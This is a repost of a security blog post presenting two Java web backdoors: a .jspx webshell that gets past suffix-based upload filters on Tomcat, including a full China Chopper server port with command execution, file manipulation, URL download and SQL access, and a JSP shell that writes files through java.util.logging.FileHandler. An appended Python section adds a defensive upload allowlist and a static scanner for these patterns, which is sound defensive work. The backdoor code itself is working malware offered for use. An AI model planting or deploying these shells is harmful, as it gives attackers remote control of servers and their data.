Two "new" Javaweb backdoors (Jspx and Java Logger)

Source: Internet
Author: User

This can be used to get past a Struts 2 (St2) setup that forces direct requests for .jsp pages to redirect to login.jsp.

Using jspx to get a shell when the .jsp suffix is restricted - Hack Blog | Hacker Blog
http://www.hackblog.cn/post/45.html

Two "new" Javaweb backdoors (Jspx and Java Logger) | Hugtion's Blog
https://www.hugtion.com/?p=768

Javaweb backdoors have received relatively little attention, and genuinely novel ones are rarer still. Here I share two of the more interesting ones for everyone to play with. The common backdoors are easily intercepted or found; I wonder how many people know the two below.

1. JSPX backdoor

In today's web applications it has become hard to upload a JSP directly. But if the upload filter only blocks the common suffixes (asp, php, jsp, aspx and the like), how do we get around it? While reading Tomcat's configuration I noticed that both .jsp and .jspx are handled by org.apache.jasper.servlet.JspServlet, so I set out to build a jspx webshell. After some back and forth the jspx backdoor was working; in my tests every Java server I tried supported it by default. This is the mapping in Tomcat's conf/web.xml:

```xml
<servlet>
    <servlet-name>jsp</servlet-name>
    <servlet-class>org.apache.jasper.servlet.JspServlet</servlet-class>
    <init-param>
        <param-name>fork</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>xpoweredBy</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>3</load-on-startup>
</servlet>
<servlet-mapping>
    <servlet-name>jsp</servlet-name>
    <url-pattern>*.jsp</url-pattern>
    <url-pattern>*.jspx</url-pattern>
</servlet-mapping>
```

There is not much information about jspx online, and the official documentation is unclear and confusing. To see how jspx is used you can look at the demo at http://jspx-bay.sourceforge.net or refer to a few articles. The notes on jspx files boil down to translating the tags inside a JSP into their XML-supported equivalents:

    <%@ include ... %>   ->  <jsp:directive.include ... />
    <%@ page ... %>      ->  <jsp:directive.page ... />
    <%@ taglib ... %>    ->  xmlns:prefix="tag library URI" (on jsp:root)
    <%= ... %>           ->  <jsp:expression> ... </jsp:expression>
    <% ... %>            ->  <jsp:scriptlet> ... </jsp:scriptlet>
    <%! ... %>           ->  <jsp:declaration> ... </jsp:declaration>

Once you know that `<% %>` is written as `<jsp:scriptlet></jsp:scriptlet>`, writing a simple shell is just a matter of swapping the markers. If you want to know exactly which tags differ from JSP, I made a simple side-by-side comparison (JSP code first, then jspx; the original screenshot is not reproduced here). Following that translation, `<%! %>` has to be replaced with a `<jsp:declaration></jsp:declaration>` tag. Another important reminder: jspx follows XML syntax, so writing `<` and `>` directly inside jsp:declaration or jsp:scriptlet is not possible and produces a compile error; they must be escaped, and it turns out that turning `<` and `>` into `&lt;` and `&gt;` is all that is needed. (Wrapping the body in a `<![CDATA[ ... ]]>` section is the other way to keep the XML well-formed.)

The jspx backdoor in its simplest form writes the content of parameter t to the file named by parameter f under the web root:

```xml
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml"
          xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8"/>
<jsp:directive.page import="java.io.*"/>
<jsp:scriptlet>
RandomAccessFile rf=new RandomAccessFile(request.getRealPath("/")+request.getParameter("f"),"rw");
rf.write(request.getParameter("t").getBytes());
rf.close();
</jsp:scriptlet>
</jsp:root>
```

And here is the jspx implementation of the final version of my earlier China Chopper (caidao) server side. It connects directly from the Chopper client as http://localhost:8080/jspx.jspx (screenshot not reproduced). Note the `&lt;`/`&gt;` escapes in the Java code, as explained above; the password parameter is the value of `pwd`:

```xml
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml"
          xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8"/>
<jsp:directive.page import="java.io.*"/>
<jsp:directive.page import="java.util.*"/>
<jsp:directive.page import="java.net.*"/>
<jsp:directive.page import="java.sql.*"/>
<jsp:directive.page import="java.text.*"/>
<jsp:declaration>
String pwd="023";
String cs="UTF-8";
String EC(String s) throws Exception{return new String(s.getBytes("ISO-8859-1"),cs);}
Connection GC(String s) throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim());if(x[1].indexOf("jdbc:oracle")!=-1){return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);}else{Connection c=DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);if(x.length&gt;4){c.setCatalog(x[4]);}return c;}}
void AA(StringBuffer sb) throws Exception{File r[]=File.listRoots();for(int i=0;i&lt;r.length;i++){sb.append(r[i].toString().substring(0,2));}}
void BB(String s,StringBuffer sb) throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT,sQ,sF="";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i&lt;l.length;i++){dt=new java.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?"W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
void EE(String s) throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();for(int k=0;k&lt;x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
void FF(String s,HttpServletResponse r) throws Exception{int n;byte[] b=new byte[512];r.reset();ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));os.write(("-&gt;"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"&lt;-").getBytes(),0,3);os.close();is.close();}
void GG(String s,String d) throws Exception{String h="0123456789ABCDEF";File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0;i&lt;d.length();i+=2){os.write((h.indexOf(d.charAt(i))&lt;&lt;4|h.indexOf(d.charAt(i+1))));}os.close();}
void HH(String s,String d) throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();for(int j=0;j&lt;z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
void II(String s,String d) throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}
void JJ(String s) throws Exception{File f=new File(s);f.mkdir();}
void KK(String s,String t) throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
void LL(String s,String d) throws Exception{URL u=new URL(s);int n=0;FileOutputStream os=new FileOutputStream(d);HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];while((n=is.read(b))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
void MM(InputStream is,StringBuffer sb) throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
void NN(String s,StringBuffer sb) throws Exception{Connection c=GC(s);ResultSet r=s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
void OO(String s,StringBuffer sb) throws Exception{Connection c=GC(s);String[] x=s.trim().split("\r\n");ResultSet r=c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length&gt;5?x[5]:x[4]:null,"%",new String[]{"TABLE"});while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
void PP(String s,StringBuffer sb) throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[x.length-1]);ResultSetMetaData d=r.getMetaData();for(int i=1;i&lt;=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
void QQ(String cs,String s,String q,StringBuffer sb,String p) throws Exception{Connection c=GC(s);Statement m=c.createStatement(1005,1008);BufferedWriter bw=null;try{ResultSet r=m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(int i=1;i&lt;=n;i++){sb.append(d.getColumnName(i)+"\t|\t");}sb.append("\r\n");if(q.indexOf("--f:")!=-1){File file=new File(p);if(q.indexOf("-to:")==-1){file.mkdir();}bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:")+4,q.length()).trim()),true),cs));}while(r.next()){for(int i=1;i&lt;=n;i++){if(q.indexOf("--f:")!=-1){bw.write(r.getObject(i)+""+"\t");bw.flush();}else{sb.append(r.getObject(i)+""+"\t|\t");}}if(bw!=null){bw.newLine();}sb.append("\r\n");}r.close();if(bw!=null){bw.close();}}catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
</jsp:declaration>
<jsp:scriptlet>
cs=request.getParameter("z0")!=null?request.getParameter("z0")+"":cs;
response.setContentType("text/html");response.setCharacterEncoding(cs);
StringBuffer sb=new StringBuffer("");
try{String z=EC(request.getParameter(pwd)+"");String z1=EC(request.getParameter("z1")+"");String z2=EC(request.getParameter("z2")+"");sb.append("-&gt;"+"|");String s=request.getSession().getServletContext().getRealPath("/");
if(z.equals("A")){sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
else if(z.equals("B")){BB(z1,sb);}
else if(z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(z1)));while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
else if(z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(z1)));bw.write(z2);bw.close();sb.append("1");}
else if(z.equals("E")){EE(z1);sb.append("1");}
else if(z.equals("F")){FF(z1,response);}
else if(z.equals("G")){GG(z1,z2);sb.append("1");}
else if(z.equals("H")){HH(z1,z2);sb.append("1");}
else if(z.equals("I")){II(z1,z2);sb.append("1");}
else if(z.equals("J")){JJ(z1);sb.append("1");}
else if(z.equals("K")){KK(z1,z2);sb.append("1");}
else if(z.equals("L")){LL(z1,z2);sb.append("1");}
else if(z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}
else if(z.equals("N")){NN(z1,sb);}
else if(z.equals("O")){OO(z1,sb);}
else if(z.equals("P")){PP(z1,sb);}
else if(z.equals("Q")){QQ(cs,z1,z2,sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\","/")+"images/");}
}catch(Exception e){sb.append("ERROR"+"://"+e.toString());}
sb.append("|"+"&lt;-");out.print(sb.toString());
</jsp:scriptlet>
</jsp:root>
```

Instructions for the final version: http://xsser.me/caidao/1.txt. The jspx.jspx above: http://xsser.me/caidao/jspx.jspx

2. Leaving a backdoor with java.util.logging.Logger

In some scenarios the shell gets filtered out, but a few interesting tricks can bypass that, for example writing a file without going through `new File`, or better still without the keyword File appearing at all. Looking through java.util.logging.Logger I found it interesting: it can write a log file, so I tried writing a shell that way, and it worked. FileHandler's default output format is XML, but that is not a problem: set a SimpleFormatter and the log is written as plain text, with the message appended verbatim after the formatter's header line. Create 2.jsp and request it with f (file name under the web root) and t (content):

```jsp
<%
java.util.logging.Logger l = java.util.logging.Logger.getLogger("t");
java.util.logging.FileHandler h = new java.util.logging.FileHandler(pageContext.getServletContext().getRealPath("/") + request.getParameter("f"), true);
h.setFormatter(new java.util.logging.SimpleFormatter());
l.addHandler(h);
l.info(request.getParameter("t"));
%>
```

(Two screenshots of the request and the resulting file are not reproduced here.)

Other slightly unusual ways of reading and writing files, for reference:

```java
new FileOutputStream("D:/sb.txt").write(new String("123").getBytes());
new DataOutputStream(new FileOutputStream("D:/1x.txt")).write(new String("123").getBytes());
FileWriter fw = new FileWriter("D:/3.txt"); fw.write("+"); fw.flush(); fw.close();
RandomAccessFile rf = new RandomAccessFile("D:/14.txt", "rw"); rf.write(new String("3b").getBytes()); rf.close();
```

Getshell.htm:
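The following Python is added here and is not code from the original post. It shows the defender's side of both techniques: the suffix denylist that section 1 bypasses beside an allowlist that rejects .jspx without having to list it, and a static triage pass over a web root that flags the jsp:scriptlet/jsp:declaration/jsp:expression markers from the tag table above and the FileHandler, RandomAccessFile, FileOutputStream, DataOutputStream and FileWriter primitives from section 2 when they sit next to request.getParameter. The sample web root is constructed in memory (the two shells from the post, reformatted, plus three benign pages); the ALLOWLIST contents are an assumption about what an upload feature needs.

```python
"""Defender's side of the two techniques in the post: an upload-name check
that goes beyond the suffix denylist the post bypasses, and a static triage
pass over a web root for JSP documents carrying code and for pages that
write request-controlled data through java.util.logging.FileHandler or the
other write primitives listed at the end of the post.

Added example, not from the original post. SAMPLE_WEBROOT is a constructed
in-memory stand-in for a scanned webapp directory."""
import re
from typing import Dict, List

DENYLIST = {"asp", "php", "jsp", "aspx"}            # suffixes the post names
ALLOWLIST = {"png", "jpg", "jpeg", "gif", "pdf"}    # assumed: what the upload feature needs


def extension(path: str) -> str:
    """Last suffix of the basename, lower-cased; '' if there is none."""
    base = path.replace("\\", "/").rsplit("/", 1)[-1]
    name, dot, ext = base.rpartition(".")
    return ext.lower() if dot and name else ""


def denylist_accepts(filename: str) -> bool:
    """The filter the post defeats: 'shell.jspx' is not on the list, yet
    Tomcat's conf/web.xml maps *.jspx to the same JspServlet as *.jsp."""
    return extension(filename) not in DENYLIST


def allowlist_accepts(filename: str) -> bool:
    """Hardened form: only suffixes the feature needs; jspx, jspf and any
    future servlet mapping are rejected without having to be enumerated."""
    return extension(filename) in ALLOWLIST


# Executable code inside a JSP document (XML syntax), per the post's tag table.
JSPX_CODE_TAG = re.compile(r"<jsp:(scriptlet|declaration|expression)\b")
# Write primitives the post demonstrates; next to request input they are a finding.
WRITE_PRIMITIVE = re.compile(
    r"\b(java\.util\.logging\.FileHandler|FileHandler|RandomAccessFile|"
    r"FileOutputStream|DataOutputStream|FileWriter)\b")
REQUEST_INPUT = re.compile(r"\brequest\.getParameter\s*\(")


def scan_page(path: str, text: str) -> List[str]:
    """Findings for one JSP/JSPX source file; empty list when nothing matches."""
    findings: List[str] = []
    ext = extension(path)
    if ext == "jspx" and JSPX_CODE_TAG.search(text):
        findings.append("jspx document carries scriptlet/declaration/expression code")
    if ext in ("jsp", "jspx", "jspf") and REQUEST_INPUT.search(text):
        prims = sorted({m.group(1) for m in WRITE_PRIMITIVE.finditer(text)})
        if prims:
            findings.append("file write fed by request parameter via " + ", ".join(prims))
    return findings


def scan_webroot(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map path -> findings for every file that produced at least one."""
    result: Dict[str, List[str]] = {}
    for path, text in files.items():
        found = scan_page(path, text)
        if found:
            result[path] = found
    return result


# Constructed sample web root: the two shells from the post (reformatted) plus
# three benign pages that exercise the rules' negative cases.
SAMPLE_WEBROOT = {
    "ROOT/jspx.jspx": (
        '<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">'
        '<jsp:directive.page import="java.io.*"/><jsp:scriptlet>'
        'RandomAccessFile rf=new RandomAccessFile(request.getRealPath("/")'
        '+request.getParameter("f"),"rw");rf.write(request.getParameter("t")'
        '.getBytes());rf.close();</jsp:scriptlet></jsp:root>'),
    "ROOT/2.jsp": (
        '<%java.util.logging.Logger l=java.util.logging.Logger.getLogger("t");'
        'java.util.logging.FileHandler h=new java.util.logging.FileHandler('
        'pageContext.getServletContext().getRealPath("/")+request.getParameter("f"),true);'
        'h.setFormatter(new java.util.logging.SimpleFormatter());l.addHandler(h);'
        'l.info(request.getParameter("t"));%>'),
    "ROOT/index.jsp": '<html><body><%= new java.util.Date() %></body></html>',
    "ROOT/report.jspx": (
        '<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="2.0">'
        '<jsp:directive.page contentType="text/html"/><html><body>Report</body></html></jsp:root>'),
    # Writes a file, but to a fixed path with no request input: not flagged.
    "ROOT/WEB-INF/export.jsp": (
        '<% java.io.FileOutputStream os=new java.io.FileOutputStream("/var/app/export.csv");'
        'os.write("done".getBytes());os.close(); %>'),
}

if __name__ == "__main__":
    for name in ("photo.png", "shell.jsp", "shell.jspx", "shell.JSPX"):
        print(f"{name:11} denylist={denylist_accepts(name)!s:5} allowlist={allowlist_accepts(name)}")
    for path, found in scan_webroot(SAMPLE_WEBROOT).items():
        print(path, "->", "; ".join(found))
```

The scanner is a triage heuristic, not a verdict: it will miss a page that reaches the primitive through reflection or assembles the class name from pieces, and a JSP document that hides its Java inside a CDATA section is still caught only because the enclosing jsp:scriptlet tag is present. On the prevention side, if an application never uses JSP documents, the *.jspx url-pattern can simply be removed from Tomcat's conf/web.xml, which takes away the mapping the post starts from.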